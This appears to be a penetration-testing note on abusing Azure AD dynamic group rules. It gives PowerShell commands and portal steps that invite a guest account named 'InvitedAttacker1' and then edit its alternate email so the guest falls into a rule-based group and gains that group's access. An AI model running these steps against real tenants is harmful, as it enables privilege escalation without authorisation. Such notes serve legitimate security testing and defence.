Abuse Dynamic Groups
- add users or devices to group membership according to group membership rules
- a guest user can manage some fields of their own profile:
manageralternate/secondary email
Enumerate Dynamic Groups
# enumerate the dynamic group condition
Get-AzADGroup -ObjectId f6c94d79-3eed-40ca-9ba9-d9743a4a1a4e | flAbuse this by inviting a new user
- user → all users → invite user
- click on new profile → invitation status → resend link → copy invitation url
- use the invitation url in a new browser window
- log in → go to directory and switch to other directory
# invite a new user as guest (in this case)
# you can get the invitation link when you click "re-sent invitation" from portal.azure.com
# or: use powershell for the invitation
New-AzureADMSInvitation -InvitedUserDisplayName "InvitedAttacker1" -InvitedUserEmailAddress "[email protected]" -InviteRedirectURL https://portal.azure.com -SendInvitationMessage $true
# get the new user object id through user thomas
Set-AzureADUser -ObjectId 49b3dacd-61c5-43b9-93c0-88fd7c709a25 -OtherMails [email protected] -VerboseNote: the Update can take some minutes before it is reflected within the dynamic group membership.